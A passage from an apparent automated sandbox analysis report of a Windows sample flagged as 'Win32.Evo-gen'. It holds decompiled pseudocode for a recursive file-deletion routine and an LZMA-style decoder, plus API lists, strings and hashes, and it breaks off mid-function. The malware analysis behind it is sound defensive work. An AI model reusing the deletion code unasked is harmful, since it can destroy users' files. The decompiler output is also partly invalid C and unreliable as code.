                                                    control_flow_graph 1208 405a03-405a29 call 405cce 1211 405a42-405a49 1208->1211 1212 405a2b-405a3d DeleteFileW 1208->1212 1214 405a4b-405a4d 1211->1214 1215 405a5c-405a6c call 406212 1211->1215 1213 405bbf-405bc3 1212->1213 1216 405a53-405a56 1214->1216 1217 405b6d-405b72 1214->1217 1223 405a7b-405a7c call 405c12 1215->1223 1224 405a6e-405a79 lstrcatW 1215->1224 1216->1215 1216->1217 1217->1213 1219 405b74-405b77 1217->1219 1221 405b81-405b89 call 406555 1219->1221 1222 405b79-405b7f 1219->1222 1221->1213 1232 405b8b-405b9f call 405bc6 call 4059bb 1221->1232 1222->1213 1225 405a81-405a85 1223->1225 1224->1225 1228 405a91-405a97 lstrcatW 1225->1228 1229 405a87-405a8f 1225->1229 1231 405a9c-405ab8 lstrlenW FindFirstFileW 1228->1231 1229->1228 1229->1231 1233 405b62-405b66 1231->1233 1234 405abe-405ac6 1231->1234 1248 405ba1-405ba4 1232->1248 1249 405bb7-405bba call 405371 1232->1249 1233->1217 1236 405b68 1233->1236 1237 405ae6-405afa call 406212 1234->1237 1238 405ac8-405ad0 1234->1238 1236->1217 1250 405b11-405b1c call 4059bb 1237->1250 1251 405afc-405b04 1237->1251 1240 405ad2-405ada 1238->1240 1241 405b45-405b55 FindNextFileW 1238->1241 1240->1237 1244 405adc-405ae4 1240->1244 1241->1234 1247 405b5b-405b5c FindClose 1241->1247 1244->1237 1244->1241 1247->1233 1248->1222 1254 405ba6-405bb5 call 405371 call 4060b3 1248->1254 1249->1213 1260 405b3d-405b40 call 405371 1250->1260 1261 405b1e-405b21 1250->1261 1251->1241 1255 405b06-405b0f call 405a03 1251->1255 1254->1213 1255->1241 1260->1241 1264 405b23-405b33 call 405371 call 4060b3 1261->1264 1265 405b35-405b3b 1261->1265 1264->1241 1265->1241
                                                    C-Code - Quality: 98%
                                                    			E00405A03(void* __eflags, signed int _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				short _v556;
				short _v558;
				struct _WIN32_FIND_DATAW _v604;
				signed int _t38;
				signed int _t52;
				signed int _t55;
				signed int _t62;
				void* _t64;
				signed char _t65;
				WCHAR* _t66;
				void* _t67;
				WCHAR* _t68;
				void* _t70;

				_t65 = _a8;
				_t68 = _a4;
				_v8 = _t65 & 0x00000004;
				_t38 = E00405CCE(__eflags, _t68);
				_v12 = _t38;
				if((_t65 & 0x00000008) != 0) {
					_t62 = DeleteFileW(_t68); // executed
					asm("sbb eax, eax");
					_t64 =  ~_t62 + 1;
					 *0x42a2c8 =  *0x42a2c8 + _t64;
					return _t64;
				}
				_a4 = _t65;
				_t8 =  &_a4;
				 *_t8 = _a4 & 0x00000001;
				__eflags =  *_t8;
				if( *_t8 == 0) {
					L5:
					E00406212(0x425730, _t68);
					__eflags = _a4;
					if(_a4 == 0) {
						E00405C12(_t68);
					} else {
						lstrcatW(0x425730, L"\\*.*");
					}
					__eflags =  *_t68;
					if( *_t68 != 0) {
						L10:
						lstrcatW(_t68, 0x40a014);
						L11:
						_t66 =  &(_t68[lstrlenW(_t68)]);
						_t38 = FindFirstFileW(0x425730,  &_v604); // executed
						_t70 = _t38;
						__eflags = _t70 - 0xffffffff;
						if(_t70 == 0xffffffff) {
							L26:
							__eflags = _a4;
							if(_a4 != 0) {
								_t30 = _t66 - 2;
								 *_t30 =  *(_t66 - 2) & 0x00000000;
								__eflags =  *_t30;
							}
							goto L28;
						} else {
							goto L12;
						}
						do {
							L12:
							__eflags = _v604.cFileName - 0x2e;
							if(_v604.cFileName != 0x2e) {
								L16:
								E00406212(_t66,  &(_v604.cFileName));
								__eflags = _v604.dwFileAttributes & 0x00000010;
								if(__eflags == 0) {
									_t52 = E004059BB(__eflags, _t68, _v8);
									__eflags = _t52;
									if(_t52 != 0) {
										E00405371(0xfffffff2, _t68);
									} else {
										__eflags = _v8 - _t52;
										if(_v8 == _t52) {
											 *0x42a2c8 =  *0x42a2c8 + 1;
										} else {
											E00405371(0xfffffff1, _t68);
											E004060B3(_t67, _t68, 0);
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E00405A03(__eflags, _t68, _a8);
									}
								}
								goto L24;
							}
							__eflags = _v558;
							if(_v558 == 0) {
								goto L24;
							}
							__eflags = _v558 - 0x2e;
							if(_v558 != 0x2e) {
								goto L16;
							}
							__eflags = _v556;
							if(_v556 == 0) {
								goto L24;
							}
							goto L16;
							L24:
							_t55 = FindNextFileW(_t70,  &_v604);
							__eflags = _t55;
						} while (_t55 != 0);
						_t38 = FindClose(_t70);
						goto L26;
					}
					__eflags =  *0x425730 - 0x5c;
					if( *0x425730 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t38;
					if(_t38 == 0) {
						L28:
						__eflags = _a4;
						if(_a4 == 0) {
							L36:
							return _t38;
						}
						__eflags = _v12;
						if(_v12 != 0) {
							_t38 = E00406555(_t68);
							__eflags = _t38;
							if(_t38 == 0) {
								goto L36;
							}
							E00405BC6(_t68);
							_t38 = E004059BB(__eflags, _t68, _v8 | 0x00000001);
							__eflags = _t38;
							if(_t38 != 0) {
								return E00405371(0xffffffe5, _t68);
							}
							__eflags = _v8;
							if(_v8 == 0) {
								goto L30;
							}
							E00405371(0xfffffff1, _t68);
							return E004060B3(_t67, _t68, 0);
						}
						L30:
						 *0x42a2c8 =  *0x42a2c8 + 1;
						return _t38;
					}
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) == 0) {
						goto L28;
					}
					goto L5;
				}
			}


















                                                    0x00405a0d
                                                    0x00405a12
                                                    0x00405a1b
                                                    0x00405a1e
                                                    0x00405a26
                                                    0x00405a29
                                                    0x00405a2c
                                                    0x00405a34
                                                    0x00405a36
                                                    0x00405a37
                                                    0x00000000
                                                    0x00405a37
                                                    0x00405a42
                                                    0x00405a45
                                                    0x00405a45
                                                    0x00405a45
                                                    0x00405a49
                                                    0x00405a5c
                                                    0x00405a63
                                                    0x00405a68
                                                    0x00405a6c
                                                    0x00405a7c
                                                    0x00405a6e
                                                    0x00405a74
                                                    0x00405a74
                                                    0x00405a81
                                                    0x00405a85
                                                    0x00405a91
                                                    0x00405a97
                                                    0x00405a9c
                                                    0x00405aa2
                                                    0x00405aad
                                                    0x00405ab3
                                                    0x00405ab5
                                                    0x00405ab8
                                                    0x00405b62
                                                    0x00405b62
                                                    0x00405b66
                                                    0x00405b68
                                                    0x00405b68
                                                    0x00405b68
                                                    0x00405b68
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00405abe
                                                    0x00405abe
                                                    0x00405abe
                                                    0x00405ac6
                                                    0x00405ae6
                                                    0x00405aee
                                                    0x00405af3
                                                    0x00405afa
                                                    0x00405b15
                                                    0x00405b1a
                                                    0x00405b1c
                                                    0x00405b40
                                                    0x00405b1e
                                                    0x00405b1e
                                                    0x00405b21
                                                    0x00405b35
                                                    0x00405b23
                                                    0x00405b26
                                                    0x00405b2e
                                                    0x00405b2e
                                                    0x00405b21
                                                    0x00405afc
                                                    0x00405b02
                                                    0x00405b04
                                                    0x00405b0a
                                                    0x00405b0a
                                                    0x00405b04
                                                    0x00000000
                                                    0x00405afa
                                                    0x00405ac8
                                                    0x00405ad0
                                                    0x00000000
                                                    0x00000000
                                                    0x00405ad2
                                                    0x00405ada
                                                    0x00000000
                                                    0x00000000
                                                    0x00405adc
                                                    0x00405ae4
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00405b45
                                                    0x00405b4d
                                                    0x00405b53
                                                    0x00405b53
                                                    0x00405b5c
                                                    0x00000000
                                                    0x00405b5c
                                                    0x00405a87
                                                    0x00405a8f
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00405a4b
                                                    0x00405a4b
                                                    0x00405a4d
                                                    0x00405b6d
                                                    0x00405b6f
                                                    0x00405b72
                                                    0x00405bc3
                                                    0x00405bc3
                                                    0x00405bc3
                                                    0x00405b74
                                                    0x00405b77
                                                    0x00405b82
                                                    0x00405b87
                                                    0x00405b89
                                                    0x00000000
                                                    0x00000000
                                                    0x00405b8c
                                                    0x00405b98
                                                    0x00405b9d
                                                    0x00405b9f
                                                    0x00000000
                                                    0x00405bba
                                                    0x00405ba1
                                                    0x00405ba4
                                                    0x00000000
                                                    0x00000000
                                                    0x00405ba9
                                                    0x00000000
                                                    0x00405bb0
                                                    0x00405b79
                                                    0x00405b79
                                                    0x00000000
                                                    0x00405b79
                                                    0x00405a53
                                                    0x00405a56
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00405a56

                                                    APIs
                                                    • DeleteFileW.KERNELBASE(?,?,75F23420,75F22EE0,00000000), ref: 00405A2C
                                                    • lstrcatW.KERNEL32(00425730,\*.*), ref: 00405A74
                                                    • lstrcatW.KERNEL32(?,0040A014), ref: 00405A97
                                                    • lstrlenW.KERNEL32(?,?,0040A014,?,00425730,?,?,75F23420,75F22EE0,00000000), ref: 00405A9D
                                                    • FindFirstFileW.KERNELBASE(00425730,?,?,?,0040A014,?,00425730,?,?,75F23420,75F22EE0,00000000), ref: 00405AAD
                                                    • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405B4D
                                                    • FindClose.KERNEL32(00000000), ref: 00405B5C
                                                    Strings
                                                    • \*.*, xrefs: 00405A6E
                                                    • "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exe", xrefs: 00405A03
                                                    • 0WB, xrefs: 00405A5C
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.39668944121.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.39668910636.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669012668.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669057368.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669238341.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669280533.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669312568.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669349693.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669430204.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669464054.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                    • String ID: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exe"$0WB$\*.*
                                                    • API String ID: 2035342205-4093399688
                                                    • Opcode ID: e466c3725a09c32567c929e5552e175012dfd7f3cab6023745cd85777645cc58
                                                    • Instruction ID: 3abc1f52a39f62d65ddaa07d2a5323def7e4f5b1e1581b0ba6d8596f0725500f
                                                    • Opcode Fuzzy Hash: e466c3725a09c32567c929e5552e175012dfd7f3cab6023745cd85777645cc58
                                                    • Instruction Fuzzy Hash: FA41CE30901A18AADB31AB668C89ABF7678EF41714F10427BF801711D1D7BC69829E6E
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004068DA Relevance: 5.4, APIs: 4, Instructions: 382COMMONCrypto
                                                    Download Yara Rule
                                                    C-Code - Quality: 98%
                                                    			E004068DA() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				void* _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t590;
				signed int* _t607;
				void* _t614;

				L0:
				while(1) {
					L0:
					if( *(_t614 - 0x40) != 0) {
						 *(_t614 - 0x34) = 1;
						 *(_t614 - 0x84) = 7;
						_t607 =  *(_t614 - 4) + 0x180 +  *(_t614 - 0x38) * 2;
						L132:
						 *(_t614 - 0x54) = _t607;
						L133:
						_t531 =  *_t607;
						_t590 = _t531 & 0x0000ffff;
						_t565 = ( *(_t614 - 0x10) >> 0xb) * _t590;
						if( *(_t614 - 0xc) >= _t565) {
							 *(_t614 - 0x10) =  *(_t614 - 0x10) - _t565;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) - _t565;
							 *(_t614 - 0x40) = 1;
							_t532 = _t531 - (_t531 >> 5);
							 *_t607 = _t532;
						} else {
							 *(_t614 - 0x10) = _t565;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
							 *_t607 = (0x800 - _t590 >> 5) + _t531;
						}
						if( *(_t614 - 0x10) >= 0x1000000) {
							L139:
							_t533 =  *(_t614 - 0x84);
							L140:
							 *(_t614 - 0x88) = _t533;
							goto L1;
						} else {
							L137:
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 5;
								goto L170;
							}
							 *(_t614 - 0x10) =  *(_t614 - 0x10) << 8;
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						__eax =  *(__ebp - 0x5c) & 0x000000ff;
						__esi =  *(__ebp - 0x60);
						__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
						__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
						__ecx =  *(__ebp - 0x3c);
						__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
						__ecx =  *(__ebp - 4);
						(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
						__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
						__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						if( *(__ebp - 0x38) >= 4) {
							if( *(__ebp - 0x38) >= 0xa) {
								_t97 = __ebp - 0x38;
								 *_t97 =  *(__ebp - 0x38) - 6;
							} else {
								 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
							}
						} else {
							 *(__ebp - 0x38) = 0;
						}
						if( *(__ebp - 0x34) == __edx) {
							__ebx = 0;
							__ebx = 1;
							L60:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								_t216 = __edx + 1; // 0x1
								__ebx = _t216;
								__cx = __ax >> 5;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L59:
								if(__ebx >= 0x100) {
									goto L54;
								}
								goto L60;
							} else {
								L57:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xf;
									goto L170;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t202 = __ebp - 0x70;
								 *_t202 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L59;
							}
						} else {
							__eax =  *(__ebp - 0x14);
							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
							if(__eax >=  *(__ebp - 0x74)) {
								__eax = __eax +  *(__ebp - 0x74);
							}
							__ecx =  *(__ebp - 8);
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
							L40:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L38:
								__eax =  *(__ebp - 0x40);
								if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
									while(1) {
										if(__ebx >= 0x100) {
											break;
										}
										__eax =  *(__ebp - 0x58);
										__edx = __ebx + __ebx;
										__ecx =  *(__ebp - 0x10);
										__esi = __edx + __eax;
										__ecx =  *(__ebp - 0x10) >> 0xb;
										__ax =  *__esi;
										 *(__ebp - 0x54) = __esi;
										__edi = __ax & 0x0000ffff;
										__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
										if( *(__ebp - 0xc) >= __ecx) {
											 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
											__cx = __ax;
											_t169 = __edx + 1; // 0x1
											__ebx = _t169;
											__cx = __ax >> 5;
											 *__esi = __ax;
										} else {
											 *(__ebp - 0x10) = __ecx;
											0x800 = 0x800 - __edi;
											0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
											__ebx = __ebx + __ebx;
											 *__esi = __cx;
										}
										 *(__ebp - 0x44) = __ebx;
										if( *(__ebp - 0x10) < 0x1000000) {
											L45:
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t155 = __ebp - 0x70;
											 *_t155 =  *(__ebp - 0x70) + 1;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
										}
									}
									L53:
									_t172 = __ebp - 0x34;
									 *_t172 =  *(__ebp - 0x34) & 0x00000000;
									L54:
									__al =  *(__ebp - 0x44);
									 *(__ebp - 0x5c) =  *(__ebp - 0x44);
									L55:
									if( *(__ebp - 0x64) == 0) {
										 *(__ebp - 0x88) = 0x1a;
										goto L170;
									}
									__ecx =  *(__ebp - 0x68);
									__al =  *(__ebp - 0x5c);
									__edx =  *(__ebp - 8);
									 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
									 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
									 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
									 *( *(__ebp - 0x68)) = __al;
									__ecx =  *(__ebp - 0x14);
									 *(__ecx +  *(__ebp - 8)) = __al;
									__eax = __ecx + 1;
									__edx = 0;
									_t191 = __eax %  *(__ebp - 0x74);
									__eax = __eax /  *(__ebp - 0x74);
									__edx = _t191;
									L79:
									 *(__ebp - 0x14) = __edx;
									L80:
									 *(__ebp - 0x88) = 2;
									goto L1;
								}
								if(__ebx >= 0x100) {
									goto L53;
								}
								goto L40;
							} else {
								L36:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xd;
									L170:
									_t568 = 0x22;
									memcpy( *(_t614 - 0x90), _t614 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t121 = __ebp - 0x70;
								 *_t121 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L38;
							}
						}
					}
					L1:
					_t534 =  *(_t614 - 0x88);
					if(_t534 > 0x1c) {
						L171:
						_t535 = _t534 | 0xffffffff;
						goto L172;
					}
					switch( *((intOrPtr*)(_t534 * 4 +  &M0040717D))) {
						case 0:
							if( *(_t614 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t534 =  *( *(_t614 - 0x70));
							if(_t534 > 0xe1) {
								goto L171;
							}
							_t538 = _t534 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t610 = _t538 / _t570;
							_t540 = _t538 % _t570 & 0x000000ff;
							asm("cdq");
							_t605 = _t540 % _t571 & 0x000000ff;
							 *(_t614 - 0x3c) = _t605;
							 *(_t614 - 0x1c) = (1 << _t610) - 1;
							 *((intOrPtr*)(_t614 - 0x18)) = (1 << _t540 / _t571) - 1;
							_t613 = (0x300 << _t605 + _t610) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t614 - 0x78))) {
								L10:
								if(_t613 == 0) {
									L12:
									 *(_t614 - 0x48) =  *(_t614 - 0x48) & 0x00000000;
									 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t613 = _t613 - 1;
									 *((short*)( *(_t614 - 4) + _t613 * 2)) = 0x400;
								} while (_t613 != 0);
								goto L12;
							}
							if( *(_t614 - 4) != 0) {
								GlobalFree( *(_t614 - 4));
							}
							_t534 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t614 - 4) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t614 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 1;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) | ( *( *(_t614 - 0x70)) & 0x000000ff) <<  *(_t614 - 0x48) << 0x00000003;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t45 = _t614 - 0x48;
							 *_t45 =  *(_t614 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t614 - 0x48) < 4) {
								goto L13;
							}
							_t546 =  *(_t614 - 0x40);
							if(_t546 ==  *(_t614 - 0x74)) {
								L20:
								 *(_t614 - 0x48) = 5;
								 *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) =  *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t614 - 0x74) = _t546;
							if( *(_t614 - 8) != 0) {
								GlobalFree( *(_t614 - 8));
							}
							_t534 = GlobalAlloc(0x40,  *(_t614 - 0x40)); // executed
							 *(_t614 - 8) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t553 =  *(_t614 - 0x60) &  *(_t614 - 0x1c);
							 *(_t614 - 0x84) = 6;
							 *(_t614 - 0x4c) = _t553;
							_t607 =  *(_t614 - 4) + (( *(_t614 - 0x38) << 4) + _t553) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 3;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							_t67 = _t614 - 0x70;
							 *_t67 =  &(( *(_t614 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							L23:
							 *(_t614 - 0x48) =  *(_t614 - 0x48) - 1;
							if( *(_t614 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							goto L0;
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L68;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								goto L89;
							}
							__eflags =  *(__ebp - 0x60);
							if( *(__ebp - 0x60) == 0) {
								goto L171;
							}
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							_t258 =  *(__ebp - 0x38) - 7 >= 0;
							__eflags = _t258;
							0 | _t258 = _t258 + _t258 + 9;
							 *(__ebp - 0x38) = _t258 + _t258 + 9;
							goto L75;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
